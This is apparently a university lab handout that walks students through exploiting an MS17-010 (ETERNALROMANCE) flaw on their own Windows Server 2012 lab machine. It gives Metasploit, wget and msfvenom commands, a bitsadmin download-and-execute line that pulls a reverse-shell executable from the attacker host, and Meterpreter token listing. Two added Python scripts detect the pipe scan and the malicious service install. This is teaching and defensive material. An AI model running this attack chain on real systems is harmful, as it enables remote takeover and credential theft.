Proj 16x: ETERNALROMANCE v. 2012 Member Server (15 pts. extra credit)

What You Need for this Project

Purpose

To exploit the member server, so we can then practice pivoting and exploiting a domain controller, in a later project.

Start your Domain Controller

Start the Domain Controller you made in the previous project.

Start the Member Server

Start your Member Server.

Log in as

Preparing your Windows Target: File Sharing

On your Member Server, click Start and type SHARING

Open "Network and Sharing Center".

On the left side, click "Advanced Sharing Options".

In the "Domain (current profile)" section, turn on these options, as shown below:

In the "All Networks" section, turn on this option, as shown below:

Click "Save changes".

Preparing your Windows Target: Activating the Guest Account

On your Member Server, at the lower left of the desktop, right-click the third icon. Click "Run as Administrator", as shown below.

A User Account Control box pops up. Click Yes.

In the Administrator PowerShell window, execute this command:

net user guest /active:yes
The command succeeds, as shown below.

Turning Off Windows Defender

Click Start. Type DEFEN

Click "Windows Defender Settings".

Turn off "Real-Time Protection", as shown below.

Finding the Target IP Address

On the Windows target, in PowerShell, execute the IPCONFIG command.

Note the target's IP address.

Enumerating Named Pipes

Named pipes are an inter-process communication mechanism used by Windows, and ETERNALROMANCE exploits them. So first, we need to find the named pipes that are available on the target.

On Kali, in a Terminal window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

msfconsole
use auxiliary/scanner/smb/pipe_auditor 
show info
set RHOSTS 172.16.1.202
exploit
A list of pipes appears, including netlogon, as shown below.
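From the defender's side, the pipe scan above leaves a trail: if Detailed File Share auditing is on, the member server records a Security event ID 5145 for every access check against a share, and for the IPC$ share the RelativeTargetName field is the pipe name. The script below is an added example (not code from the project page or from Metasploit); it assumes those events have been exported one per line as pipe-separated fields, and the sample events are constructed. It flags any source address that touches several distinct IPC$ pipes within a short window, which is what pipe_auditor looks like in the log.

```python
"""Detect named-pipe enumeration against IPC$ from Security event ID 5145.

Added example, not part of the original project page. Assumes the member
server audits "Detailed File Share" events and that they were exported as
Timestamp|EventID|IpAddress|ShareName|RelativeTargetName lines. The sample
events below are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a scanner at 172.16.1.188 opens seven pipes in two
# seconds; a normal client at 172.16.1.50 touches one pipe now and then.
SAMPLE_EVENTS = """\
2017-10-05T10:00:00|5145|172.16.1.188|\\\\*\\IPC$|netlogon
2017-10-05T10:00:00|5145|172.16.1.188|\\\\*\\IPC$|lsarpc
2017-10-05T10:00:00|5145|172.16.1.188|\\\\*\\IPC$|samr
2017-10-05T10:00:01|5145|172.16.1.188|\\\\*\\IPC$|browser
2017-10-05T10:00:01|5145|172.16.1.188|\\\\*\\IPC$|srvsvc
2017-10-05T10:00:01|5145|172.16.1.188|\\\\*\\IPC$|spoolss
2017-10-05T10:00:02|5145|172.16.1.188|\\\\*\\IPC$|atsvc
2017-10-05T10:03:00|5145|172.16.1.50|\\\\*\\IPC$|srvsvc
2017-10-05T10:03:10|5145|172.16.1.50|\\\\*\\Users|Sally\\report.docx
2017-10-05T10:09:00|5145|172.16.1.50|\\\\*\\IPC$|spoolss
"""


def parse_events(text):
    """Parse the exported lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, src, share, target = line.split("|", 4)
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "src": src,
            "share": share,
            "target": target,
        })
    return events


def detect_pipe_enumeration(events, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per source that opened >= threshold distinct IPC$
    pipes inside any `window`-long span. Only 5145 events on IPC$ count;
    ordinary file-share access (Users, C$, ...) is ignored."""
    by_src = defaultdict(list)
    for e in events:
        if e["event_id"] == 5145 and e["share"].upper().endswith("IPC$"):
            by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        best, best_start = set(), None
        # Slide a window starting at each event and keep the densest one.
        for i, start in enumerate(evs):
            pipes = {e["target"].lower() for e in evs[i:]
                     if e["time"] - start["time"] <= window}
            if len(pipes) > len(best):
                best, best_start = pipes, start["time"]
        if len(best) >= threshold:
            alerts.append({
                "source": src,
                "distinct_pipes": len(best),
                "pipes": sorted(best),
                "first_seen": best_start,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_pipe_enumeration(parse_events(SAMPLE_EVENTS)):
        print(f"{alert['source']} opened {alert['distinct_pipes']} pipes "
              f"starting {alert['first_seen']}: {', '.join(alert['pipes'])}")
```

The threshold and window are tuning knobs: a domain member legitimately opens netlogon, lsarpc or samr during logon, so a single pipe from a host is noise, while seven distinct pipes from one address in two seconds is a scan. Disabling SMBv1 and applying MS17-010 is the fix; the audit trail is how you find hosts that were probed before that happened.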

Exploiting the Target with ETERNALROMANCE

On Kali, in a Terminal window, execute these commands to download the exploit (into a file named 42315), download a Python library it needs, and run it:
wget https://www.exploit-db.com/download/42315
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
python 42315
It runs, as shown below, asking for <ip> and [pipe_name].

We need to put the username into the exploit file.

On Kali, in a Terminal window, execute this command:

nano 42315
Scroll down a page to find the USERNAME line. Insert the username GUEST as shown below.

Press Ctrl+X, Y, Enter to save the file.

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:

python 42315 172.16.1.202 netlogon
The exploit runs as shown below, ending with the message "creating file c:\pwned.txt on the target".

To see if it worked, on the Windows target, at the lower left of the desktop, click the fourth icon to open Windows Explorer.

Navigate to C:. The pwned file should be visible, as shown below.

Saving the Screen Image

Make sure you can see the pwned file, as shown above.

Save a FULL DESKTOP image with the filename Proj 15xa from Your Name.

Creating Meterpreter Malware

In Kali, execute these commands to create a malicious Windows executable file named "shell-service.exe" and serve it from a malicious Web server. The exe-service format builds an executable that runs as a Windows service, which is how the exploit's service_exec step will launch it.

Adjust the IP address to match the IP address of your Kali machine (the C&C server). This shell will use the default port of 4444.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe-service > /var/www/html/shell-service.exe
service apache2 start

Start a Metasploit Handler

In Kali, open a new Terminal window and execute these commands to start a C&C listener.
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
The listener starts, as shown below.

Inserting the Command Line

On Kali, in a Terminal window, execute this command to copy the exploit to a file named romance.py and edit it.
cp 42315 romance.py
nano romance.py
In nano, press Ctrl+W to search. Enter a search string of pwned

Press Enter.

Nano finds the string. As before, we will modify the line beginning with "service_exec", highlighted in the image below.

In that line, carefully delete the text between the single quotes, as shown below.

Insert this line between the single quotes, as shown below. Replace the IP address with the IP address of your Kali machine.

cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\shell-service.exe &&  C:\shell-service.exe

Save the file with Ctrl+X, Y, Enter.
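When the exploit's service_exec step runs that command line, it does so by creating and starting a service on the target through the Service Control Manager, which writes a System event ID 7045 ("A service was installed in the system") whose ImagePath is the command itself. The script below is an added example (not code from the project page, the exploit, or any vendor) showing how a defender would flag such an installation; it assumes the 7045 events have been exported as key=value pairs separated by "; " and that the event's field names (ServiceName, ImagePath, ServiceType, StartType, AccountName) are used as the keys. The sample events are constructed; the suspicious one mirrors the bitsadmin line from this project, and the random-looking service name is a made-up placeholder.

```python
"""Flag service installations (System event ID 7045) whose ImagePath is a
download-and-execute one-liner rather than a normal service binary.

Added example, not part of the original project page. Assumes 7045 events
were exported one per line as "Key=Value; Key=Value; ..." using the event's
own field names. The sample events are constructed.
"""
import re

SAMPLE_7045 = """\
ServiceName=Sysmon64; ImagePath=C:\\Windows\\Sysmon64.exe; ServiceType=user mode service; StartType=auto start; AccountName=LocalSystem
ServiceName=MSSQL$PROD; ImagePath="C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe" -sPROD; ServiceType=user mode service; StartType=auto start; AccountName=NT Service\\MSSQL$PROD
ServiceName=gxYtpq; ImagePath=cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\\shell-service.exe && C:\\shell-service.exe; ServiceType=user mode service; StartType=demand start; AccountName=LocalSystem
"""

# Each indicator is a (name, regex) pair tested against ImagePath. None of
# them is conclusive alone; a real service binary matches none of them.
INDICATORS = [
    # A service whose "binary" is a cmd.exe one-liner.
    ("shell_wrapper", re.compile(r"\bcmd(?:\.exe)?\s+/c\b", re.I)),
    # BITS used to fetch a file as part of service start.
    ("bits_download", re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\b", re.I)),
    # A URL embedded in the service path.
    ("url_in_path", re.compile(r"https?://", re.I)),
    # Command chaining: fetch something, then run it.
    ("command_chain", re.compile(r"&&|\|\|")),
    # An executable sitting directly in a drive root (C:\foo.exe).
    ("exe_in_drive_root", re.compile(r"[A-Za-z]:\\[^\\\s\"]+\.exe\b", re.I)),
]


def parse_7045(text):
    """Parse exported 7045 lines into one dict per event."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = {}
        for part in line.split("; "):
            key, _, value = part.partition("=")
            fields[key.strip()] = value.strip()
        events.append(fields)
    return events


def find_suspicious_services(events, min_hits=2):
    """Return a finding for every event whose ImagePath trips at least
    `min_hits` indicators, with the indicator names as the reasons."""
    findings = []
    for ev in events:
        path = ev.get("ImagePath", "")
        reasons = [name for name, rx in INDICATORS if rx.search(path)]
        if len(reasons) >= min_hits:
            findings.append({
                "service": ev.get("ServiceName"),
                "account": ev.get("AccountName"),
                "image_path": path,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_services(parse_7045(SAMPLE_7045)):
        print(f"service {f['service']} as {f['account']}: {', '.join(f['reasons'])}")
        print(f"  {f['image_path']}")
```

Requiring two indicators keeps a lone "&&" or a legitimately odd path from paging anyone, while the project's command line trips all five. Because the service is created remotely over SMB, pairing this with the 5145 audit trail on IPC$ from the same source address gives the full picture of the intrusion.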

Exploiting the Target Again

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:
python romance.py 172.16.1.202 netlogon
The exploit runs as shown below.

The Meterpreter window shows a shell opening.

Execute these commands to interact with the shell and see who you are: you are SYSTEM, as shown below.

sessions -i 1
getuid
Execute these commands to list available tokens. One of them is HACKME\Sally, as shown below.
use incognito
list_tokens -u

Saving the Screen Image

Make sure you can see that one of the "Delegation Tokens" is HACKME\Sally, as shown above.

Save a FULL DESKTOP image with the filename Proj 16xb from Your Name.

Turning in Your Project

Send the images as email attachments to cnit.124@gmail.com with a Subject line of Proj 16x from Your Name.


Posted 9-27-17 by Sam Bowne
Added Windows Defender portion 10-5-17